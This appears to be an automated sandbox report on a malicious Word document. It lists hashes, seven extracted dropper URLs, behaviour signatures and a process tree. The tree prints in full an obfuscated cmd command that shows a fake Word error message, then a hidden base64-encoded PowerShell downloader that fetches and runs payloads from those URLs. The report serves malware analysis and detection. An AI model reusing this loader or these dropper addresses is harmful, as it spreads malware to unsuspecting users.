Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    13-01-2021 11:05

General

  • Target

    Account_30_12_2020.doc

  • Size

    156KB

  • MD5

    97213d62042927ecab4a2608b38a37af

  • SHA1

    d4c68b37c5729d94699e00e8fc1edf97a18ba599

  • SHA256

    9d1c6b80623e5e370ed018b95870675936022c4a9bf0ddc1378db520b304309e

  • SHA512

    4e89d7541e38a797c279f8e271adb06ba54a2764d29a8b4e33b93bb79bee74f1affa147ac3dfd9cd4e6330290dda64cac1b99a7f7fd4b3bc0e5c14cc4d6196f6

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://www.mypostletter.com/wp-admin/G3/

exe.dropper

http://www.trueapparels.com/a/4k/

exe.dropper

http://iut-bethune.univ-artois.fr/benefits-of-hhnzoet/T/

exe.dropper

http://www.xportfreight.com/wp-content/c/

exe.dropper

http://talentvalue.com/wp-admin/DEoUM/

exe.dropper

https://skyeconsultoria.com.br/wp-admin/co/

exe.dropper

https://atprofessional.org/wp-content/O6Vey/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Account_30_12_2020.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1992
  • C:\Windows\system32\cmd.exe
    cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAkAEcAYQBtAHYAIAAgAD0AIAAgAFsAVABZAFAAZQBdACgAIgB7ADEAfQB7ADMAfQB7ADQAfQB7ADAAfQB7ADIAfQB7ADUAfQAiACAALQBmACAAJwBEAEkAJwAsACcAUwAnACwAJwBSAEUAYwBUACcALAAnAHkAUwB0AEUAbQAuAEkATwAnACwAJwAuACcALAAnAE8AcgB5ACcAKQA7ACQAMgBPAE4AIAA9ACAAIABbAFQAWQBQAEUAXQAoACIAewAzAH0AewA3AH0AewAyAH0AewA2AH0AewA1AH0AewAwAH0AewA0AH0AewAxAH0AIgAgAC0AZgAgACcATQBBAG4AQQAnACwAJwByACcALAAnAFQALgAnACwAJwBzAFkAcwBUAGUAbQAnACwAJwBnAEUAJwAsACcAYwBFAFAATwBpAE4AdAAnACwAJwBzAGUAcgBWAGkAJwAsACcALgBOAGUAJwApACAAIAA7ACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACgAKAAnAFMAJwArACcAaQBsACcAKQArACgAJwBlACcAKwAnAG4AdAAnACkAKwAnAGwAeQAnACsAKAAnAEMAbwAnACsAJwBuAHQAaQBuAHUAZQAnACkAKQA7ACQASgB6ADMAZwB5AGUAdwA9ACQAWgAxADgAUwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUwAxADcAVgA7ACQAQwA4ADMAVAA9ACgAJwBFADEAJwArACcAMwBVACcAKQA7ACAAKAAgAGcASQAgAHYAQQByAGkAQQBCAGwARQA6AEcAQQBNAHYAIAApAC4AVgBhAGwAdQBlADoAOgAiAEMAUgBgAEUAYQB0AEUARABJAFIAZQBjAGAAVABvAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9ACcAKwAoACcATQAnACsAJwBnAGYAJwApACsAJwA4ADcAJwArACcAYwBoAHsAMAB9AEwAJwArACgAJwBkACcAKwAnADEAdgAyAF8AJwApACsAJwBtAHsAJwArACcAMAB9ACcAKQAtAGYAIAAgAFsAQwBoAGEAcgBdADkAMgApACkAOwAkAFMANgBfAFkAPQAoACcASwAnACsAKAAnADcAMwAnACsAJwBJACcAKQApADsAIAAoACAARwBFAHQALQB2AGEAcgBpAEEAQgBsAEUAIAAgACgAJwAyAE8AJwArACcAbgAnACkAIAAgAC0AVgBhAGwAIAAgACkAOgA6ACIAUwBgAEUAYwB1AFIAYABJAHQAeQBwAGAAUgBvAGAAVABPAGMATwBsACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABSADUANQBCAD0AKAAnAFAANgAnACsAJwAwAEkAJwApADsAJABBAHkAZgBjAG4AYgA5ACAAPQAgACgAKAAnAEMAJwArACcANgAyACcAKQArACcAQQAnACkAOwAkAE8ANgA4AEwAPQAoACcATwAnACsAKAAnADcAJwArACcAMwBRACcAKQApADsAJABIAHkAbABrADYANwBvAD0AJABIAE8ATQBFACsAKAAoACcAMgAnACsAKAAnAEgAdgAnACsAJwBNACcAKQArACcAZwBmACcAKwAnADgAJwArACgAJwA3ACcAKwAnAGMAaAAyAEgAdgBMAGQAMQB2ACcAKwAnADIAXwAnACsAJwBtACcAKwAnADIASAAnACkAKwAnAHYAJwApAC4AIgByAGAARQBgAHAAbABBAGMAZQAiACgAKABbAGMASABBAHIAXQA1ADAAKwBbAGMASABBAHIAXQA3ADIAKwBbAGMASABBAHIAXQAxADEAOAApACwAJwBcACcAKQApACsAJABBAHkAZgBjAG4AYgA5ACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATQAyADgASAA9ACgAJwBDACcAKwAoACcAOQAnACsAJwA0AE0AJwApACkAOwAkAE8AbgA4AHkAbgA5ADMAPQAoACgAJwBdAGUAJwArACcAMQAnACkAKwAoACcAcgAnACsAJwBbAFMAOgAvACcAKwAnAC8AdwAnACkAKwAoACcAdwB3AC4AbQB5AHAAJwArACcAbwAnACkAKwAnAHMAJwArACgAJwB0ACcAKwAnAGwAZQB0AHQAZQAnACsAJwByAC4AYwBvAG0ALwAnACkAKwAoACcAdwAnACsAJwBwAC0AJwApACsAKAAnAGEAZABtACcAKwAnAGkAbgAvACcAKQArACgAJwBHACcAKwAnADMALwAnACkAKwAnAEAAXQAnACsAJwBlACcAKwAoACcAMQAnACsAJwByAFsAJwApACsAJwBTACcAKwAoACcAOgAvAC8AJwArACcAdwAnACkAKwAoACcAdwB3AC4AJwArACcAdAByACcAKQArACgAJwB1AGUAYQAnACsAJwBwACcAKQArACgAJwBwACcAKwAnAGEAcgAnACkAKwAoACcAZQAnACsAJwBsAHMAJwApACsAJwAuACcAKwAoACcAYwBvACcAKwAnAG0AJwApACsAJwAvACcAKwAnAGEAJwArACcALwAnACsAKAAnADQAawAnACsAJwAvACcAKQArACcAQAAnACsAKAAnAF0AZQAxAHIAJwArACcAWwBTADoAJwApACsAKAAnAC8AJwArACcALwBpACcAKQArACgAJwB1ACcAKwAnAHQALQBiACcAKQArACgAJwBlAHQAJwArACcAaAAnACkAKwAnAHUAbgAnACsAKAAnAGUAJwArACcALgB1AG4AaQAnACsAJwB2AC0AYQAnACkAKwAnAHIAdAAnACsAKAAnAG8AaQAnACsAJwBzAC4AZgAnACkAKwAoACcAcgAvAGIAZQAnACsAJwBuAGUAZgAnACkAKwAoACcAaQB0AHMAJwArACcALQBvAGYALQAnACkAKwAnAGgAaAAnACsAJwBuAHoAJwArACgAJwBvACcAKwAnAGUAdAAnACkAKwAoACcALwBUACcAKwAnAC8AQAAnACkAKwAnAF0AZQAnACsAKAAnADEAJwArACcAcgBbAFMAJwApACsAJwA6ACcAKwAnAC8ALwAnACsAJwB3ACcAKwAoACcAdwAnACsAJwB3AC4AeAAnACsAJwBwAG8AcgB0ACcAKwAnAGYAcgBlAGkAJwApACsAJwBnAGgAJwArACcAdAAuACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlAG4AdAAnACsAJwAvAGMAJwApACsAKAAnAC8AQAAnACsAJwBdACcAKQArACgAJwBlADEAJwArACcAcgBbACcAKQArACcAUwAnACsAKAAnADoALwAnACsAJwAvACcAKQArACgAJwB0AGEAbAAnACsAJwBlACcAKQArACgAJwBuACcAKwAnAHQAdgAnACkAKwAnAGEAbAAnACsAKAAnAHUAJwArACcAZQAuAGMAbwBtAC8AJwApACsAJwB3AHAAJwArACcALQBhACcAKwAnAGQAJwArACcAbQBpACcAKwAoACcAbgAnACsAJwAvAEQARQBvAFUAJwApACsAJwBNAC8AJwArACgAJwBAAF0AZQAnACsAJwAxAHIAJwApACsAKAAnAFsAJwArACcAUwBzADoALwAvACcAKQArACgAJwBzAGsAJwArACcAeQBlAGMAJwApACsAJwBvAG4AJwArACgAJwBzACcAKwAnAHUAbAB0AG8AJwApACsAKAAnAHIAaQAnACsAJwBhAC4AYwBvAG0ALgAnACsAJwBiACcAKQArACgAJwByAC8AdwBwAC0AJwArACcAYQBkACcAKwAnAG0AJwApACsAJwBpAG4AJwArACcALwBjACcAKwAoACcAbwAnACsAJwAvAEAAJwApACsAKAAnAF0AZQAnACsAJwAxACcAKQArACcAcgBbACcAKwAnAFMAJwArACcAcwA6ACcAKwAoACcALwAnACsAJwAvAGEAJwApACsAJwB0AHAAJwArACcAcgBvACcAKwAoACcAZgBlACcAKwAnAHMAcwBpACcAKQArACcAbwBuACcAKwAoACcAYQBsACcAKwAnAC4AbwAnACkAKwAoACcAcgAnACsAJwBnAC8AJwArACcAdwBwAC0AYwBvAG4AdAAnACkAKwAnAGUAJwArACgAJwBuACcAKwAnAHQALwAnACkAKwAnAE8ANgAnACsAJwBWACcAKwAoACcAZQB5ACcAKwAnAC8AJwApACkALgAiAFIARQBwAGwAYABBAGAAYwBFACIAKAAoACcAXQBlACcAKwAoACcAMQAnACsAJwByAFsAUwAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACgAJwBoACcAKwAnAHQAdAAnACkAKwAnAHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAYABQAEwAaQB0ACIAKAAkAFMANAAyAE8AIAArACAAJABKAHoAMwBnAHkAZQB3ACAAKwAgACQAUwAyADAAQgApADsAJABFADUAXwBaAD0AKAAnAFgAJwArACgAJwBfADAAJwArACcAVQAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUgAyAGsAcQBuADAAMAAgAGkAbgAgACQATwBuADgAeQBuADkAMwApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0ATwAnACsAJwBiAGoAJwArACcAZQBjAHQAJwApACAAUwB5AFMAVABlAG0ALgBOAEUAdAAuAFcARQBCAEMATABpAGUATgB0ACkALgAiAGQAYABPAHcATgBMAG8AQQBgAGQARgBpAGAATABlACIAKAAkAFIAMgBrAHEAbgAwADAALAAgACQASAB5AGwAawA2ADcAbwApADsAJABEADMAOABDAD0AKAAnAE0AOQAnACsAJwA3AFkAJwApADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAEgAeQBsAGsANgA3AG8AKQAuACIAbABlAGAATgBgAEcAdABoACIAIAAtAGcAZQAgADQAMwA3ADAANQApACAAewAmACgAJwByAHUAbgAnACsAJwBkAGwAbAAnACsAJwAzADIAJwApACAAJABIAHkAbABrADYANwBvACwAKAAnAEMAJwArACgAJwBvAG4AJwArACcAdAAnACkAKwAoACcAcgBvACcAKwAnAGwAJwApACsAKAAnAF8AUgB1AG4ARAAnACsAJwBMACcAKwAnAEwAJwApACkALgAiAFQATwBgAHMAYABUAHIAaQBOAEcAIgAoACkAOwAkAEcANwAwAEgAPQAoACcASwAnACsAKAAnADIAJwArACcANABWACcAKQApADsAYgByAGUAYQBrADsAJABSADIAMQBVAD0AKAAnAEUAOAAnACsAJwA1AE0AJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABZADYAOABBAD0AKAAnAE8AJwArACgAJwAxACcAKwAnADAAUAAnACkAKQA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:912
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:328
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwersheLL -w hidden -ENCOD IAAkAEcAYQBtAHYAIAAgAD0AIAAgAFsAVABZAFAAZQBdACgAIgB7ADEAfQB7ADMAfQB7ADQAfQB7ADAAfQB7ADIAfQB7ADUAfQAiACAALQBmACAAJwBEAEkAJwAsACcAUwAnACwAJwBSAEUAYwBUACcALAAnAHkAUwB0AEUAbQAuAEkATwAnACwAJwAuACcALAAnAE8AcgB5ACcAKQA7ACQAMgBPAE4AIAA9ACAAIABbAFQAWQBQAEUAXQAoACIAewAzAH0AewA3AH0AewAyAH0AewA2AH0AewA1AH0AewAwAH0AewA0AH0AewAxAH0AIgAgAC0AZgAgACcATQBBAG4AQQAnACwAJwByACcALAAnAFQALgAnACwAJwBzAFkAcwBUAGUAbQAnACwAJwBnAEUAJwAsACcAYwBFAFAATwBpAE4AdAAnACwAJwBzAGUAcgBWAGkAJwAsACcALgBOAGUAJwApACAAIAA7ACAAIAAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACgAKAAnAFMAJwArACcAaQBsACcAKQArACgAJwBlACcAKwAnAG4AdAAnACkAKwAnAGwAeQAnACsAKAAnAEMAbwAnACsAJwBuAHQAaQBuAHUAZQAnACkAKQA7ACQASgB6ADMAZwB5AGUAdwA9ACQAWgAxADgAUwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUwAxADcAVgA7ACQAQwA4ADMAVAA9ACgAJwBFADEAJwArACcAMwBVACcAKQA7ACAAKAAgAGcASQAgAHYAQQByAGkAQQBCAGwARQA6AEcAQQBNAHYAIAApAC4AVgBhAGwAdQBlADoAOgAiAEMAUgBgAEUAYQB0AEUARABJAFIAZQBjAGAAVABvAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9ACcAKwAoACcATQAnACsAJwBnAGYAJwApACsAJwA4ADcAJwArACcAYwBoAHsAMAB9AEwAJwArACgAJwBkACcAKwAnADEAdgAyAF8AJwApACsAJwBtAHsAJwArACcAMAB9ACcAKQAtAGYAIAAgAFsAQwBoAGEAcgBdADkAMgApACkAOwAkAFMANgBfAFkAPQAoACcASwAnACsAKAAnADcAMwAnACsAJwBJACcAKQApADsAIAAoACAARwBFAHQALQB2AGEAcgBpAEEAQgBsAEUAIAAgACgAJwAyAE8AJwArACcAbgAnACkAIAAgAC0AVgBhAGwAIAAgACkAOgA6ACIAUwBgAEUAYwB1AFIAYABJAHQAeQBwAGAAUgBvAGAAVABPAGMATwBsACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABSADUANQBCAD0AKAAnAFAANgAnACsAJwAwAEkAJwApADsAJABBAHkAZgBjAG4AYgA5ACAAPQAgACgAKAAnAEMAJwArACcANgAyACcAKQArACcAQQAnACkAOwAkAE8ANgA4AEwAPQAoACcATwAnACsAKAAnADcAJwArACcAMwBRACcAKQApADsAJABIAHkAbABrADYANwBvAD0AJABIAE8ATQBFACsAKAAoACcAMgAnACsAKAAnAEgAdgAnACsAJwBNACcAKQArACcAZwBmACcAKwAnADgAJwArACgAJwA3ACcAKwAnAGMAaAAyAEgAdgBMAGQAMQB2ACcAKwAnADIAXwAnACsAJwBtACcAKwAnADIASAAnACkAKwAnAHYAJwApAC4AIgByAGAARQBgAHAAbABBAGMAZQAiACgAKABbAGMASABBAHIAXQA1ADAAKwBbAGMASABBAHIAXQA3ADIAKwBbAGMASABBAHIAXQAxADEAOAApACwAJwBcACcAKQApACsAJABBAHkAZgBjAG4AYgA5ACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATQAyADgASAA9ACgAJwBDACcAKwAoACcAOQAnACsAJwA0AE0AJwApACkAOwAkAE8AbgA4AHkAbgA5ADMAPQAoACgAJwBdAGUAJwArACcAMQAnACkAKwAoACcAcgAnACsAJwBbAFMAOgAvACcAKwAnAC8AdwAnACkAKwAoACcAdwB3AC4AbQB5AHAAJwArACcAbwAnACkAKwAnAHMAJwArACgAJwB0ACcAKwAnAGwAZQB0AHQAZQAnACsAJwByAC4AYwBvAG0ALwAnACkAKwAoACcAdwAnACsAJwBwAC0AJwApACsAKAAnAGEAZABtACcAKwAnAGkAbgAvACcAKQArACgAJwBHACcAKwAnADMALwAnACkAKwAnAEAAXQAnACsAJwBlACcAKwAoACcAMQAnACsAJwByAFsAJwApACsAJwBTACcAKwAoACcAOgAvAC8AJwArACcAdwAnACkAKwAoACcAdwB3AC4AJwArACcAdAByACcAKQArACgAJwB1AGUAYQAnACsAJwBwACcAKQArACgAJwBwACcAKwAnAGEAcgAnACkAKwAoACcAZQAnACsAJwBsAHMAJwApACsAJwAuACcAKwAoACcAYwBvACcAKwAnAG0AJwApACsAJwAvACcAKwAnAGEAJwArACcALwAnACsAKAAnADQAawAnACsAJwAvACcAKQArACcAQAAnACsAKAAnAF0AZQAxAHIAJwArACcAWwBTADoAJwApACsAKAAnAC8AJwArACcALwBpACcAKQArACgAJwB1ACcAKwAnAHQALQBiACcAKQArACgAJwBlAHQAJwArACcAaAAnACkAKwAnAHUAbgAnACsAKAAnAGUAJwArACcALgB1AG4AaQAnACsAJwB2AC0AYQAnACkAKwAnAHIAdAAnACsAKAAnAG8AaQAnACsAJwBzAC4AZgAnACkAKwAoACcAcgAvAGIAZQAnACsAJwBuAGUAZgAnACkAKwAoACcAaQB0AHMAJwArACcALQBvAGYALQAnACkAKwAnAGgAaAAnACsAJwBuAHoAJwArACgAJwBvACcAKwAnAGUAdAAnACkAKwAoACcALwBUACcAKwAnAC8AQAAnACkAKwAnAF0AZQAnACsAKAAnADEAJwArACcAcgBbAFMAJwApACsAJwA6ACcAKwAnAC8ALwAnACsAJwB3ACcAKwAoACcAdwAnACsAJwB3AC4AeAAnACsAJwBwAG8AcgB0ACcAKwAnAGYAcgBlAGkAJwApACsAJwBnAGgAJwArACcAdAAuACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlAG4AdAAnACsAJwAvAGMAJwApACsAKAAnAC8AQAAnACsAJwBdACcAKQArACgAJwBlADEAJwArACcAcgBbACcAKQArACcAUwAnACsAKAAnADoALwAnACsAJwAvACcAKQArACgAJwB0AGEAbAAnACsAJwBlACcAKQArACgAJwBuACcAKwAnAHQAdgAnACkAKwAnAGEAbAAnACsAKAAnAHUAJwArACcAZQAuAGMAbwBtAC8AJwApACsAJwB3AHAAJwArACcALQBhACcAKwAnAGQAJwArACcAbQBpACcAKwAoACcAbgAnACsAJwAvAEQARQBvAFUAJwApACsAJwBNAC8AJwArACgAJwBAAF0AZQAnACsAJwAxAHIAJwApACsAKAAnAFsAJwArACcAUwBzADoALwAvACcAKQArACgAJwBzAGsAJwArACcAeQBlAGMAJwApACsAJwBvAG4AJwArACgAJwBzACcAKwAnAHUAbAB0AG8AJwApACsAKAAnAHIAaQAnACsAJwBhAC4AYwBvAG0ALgAnACsAJwBiACcAKQArACgAJwByAC8AdwBwAC0AJwArACcAYQBkACcAKwAnAG0AJwApACsAJwBpAG4AJwArACcALwBjACcAKwAoACcAbwAnACsAJwAvAEAAJwApACsAKAAnAF0AZQAnACsAJwAxACcAKQArACcAcgBbACcAKwAnAFMAJwArACcAcwA6ACcAKwAoACcALwAnACsAJwAvAGEAJwApACsAJwB0AHAAJwArACcAcgBvACcAKwAoACcAZgBlACcAKwAnAHMAcwBpACcAKQArACcAbwBuACcAKwAoACcAYQBsACcAKwAnAC4AbwAnACkAKwAoACcAcgAnACsAJwBnAC8AJwArACcAdwBwAC0AYwBvAG4AdAAnACkAKwAnAGUAJwArACgAJwBuACcAKwAnAHQALwAnACkAKwAnAE8ANgAnACsAJwBWACcAKwAoACcAZQB5ACcAKwAnAC8AJwApACkALgAiAFIARQBwAGwAYABBAGAAYwBFACIAKAAoACcAXQBlACcAKwAoACcAMQAnACsAJwByAFsAUwAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACgAJwBoACcAKwAnAHQAdAAnACkAKwAnAHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAYABQAEwAaQB0ACIAKAAkAFMANAAyAE8AIAArACAAJABKAHoAMwBnAHkAZQB3ACAAKwAgACQAUwAyADAAQgApADsAJABFADUAXwBaAD0AKAAnAFgAJwArACgAJwBfADAAJwArACcAVQAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUgAyAGsAcQBuADAAMAAgAGkAbgAgACQATwBuADgAeQBuADkAMwApAHsAdAByAHkAewAoACYAKAAnAE4AZQB3AC0ATwAnACsAJwBiAGoAJwArACcAZQBjAHQAJwApACAAUwB5AFMAVABlAG0ALgBOAEUAdAAuAFcARQBCAEMATABpAGUATgB0ACkALgAiAGQAYABPAHcATgBMAG8AQQBgAGQARgBpAGAATABlACIAKAAkAFIAMgBrAHEAbgAwADAALAAgACQASAB5AGwAawA2ADcAbwApADsAJABEADMAOABDAD0AKAAnAE0AOQAnACsAJwA3AFkAJwApADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAEgAeQBsAGsANgA3AG8AKQAuACIAbABlAGAATgBgAEcAdABoACIAIAAtAGcAZQAgADQAMwA3ADAANQApACAAewAmACgAJwByAHUAbgAnACsAJwBkAGwAbAAnACsAJwAzADIAJwApACAAJABIAHkAbABrADYANwBvACwAKAAnAEMAJwArACgAJwBvAG4AJwArACcAdAAnACkAKwAoACcAcgBvACcAKwAnAGwAJwApACsAKAAnAF8AUgB1AG4ARAAnACsAJwBMACcAKwAnAEwAJwApACkALgAiAFQATwBgAHMAYABUAHIAaQBOAEcAIgAoACkAOwAkAEcANwAwAEgAPQAoACcASwAnACsAKAAnADIAJwArACcANABWACcAKQApADsAYgByAGUAYQBrADsAJABSADIAMQBVAD0AKAAnAEUAOAAnACsAJwA1AE0AJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABZADYAOABBAD0AKAAnAE8AJwArACgAJwAxACcAKwAnADAAUAAnACkAKQA=
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:572

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/328-4-0x0000000000000000-mapping.dmp
    • memory/572-5-0x0000000000000000-mapping.dmp
    • memory/572-6-0x000007FEF4F10000-0x000007FEF58FC000-memory.dmp
      Filesize

      9.9MB

    • memory/572-7-0x00000000022D0000-0x00000000022D1000-memory.dmp
      Filesize

      4KB

    • memory/572-8-0x000000001AA90000-0x000000001AA91000-memory.dmp
      Filesize

      4KB

    • memory/572-9-0x00000000023B0000-0x00000000023B1000-memory.dmp
      Filesize

      4KB

    • memory/572-10-0x0000000002460000-0x0000000002461000-memory.dmp
      Filesize

      4KB

    • memory/572-11-0x000000001B470000-0x000000001B471000-memory.dmp
      Filesize

      4KB

    • memory/572-12-0x000000001C1B0000-0x000000001C1B1000-memory.dmp
      Filesize

      4KB

    • memory/1992-3-0x0000000000524000-0x0000000000528000-memory.dmp
      Filesize

      16KB

    • memory/1992-2-0x0000000000524000-0x0000000000528000-memory.dmp
      Filesize

      16KB

    • memory/1992-13-0x0000000001FB0000-0x0000000001FB1000-memory.dmp
      Filesize

      4KB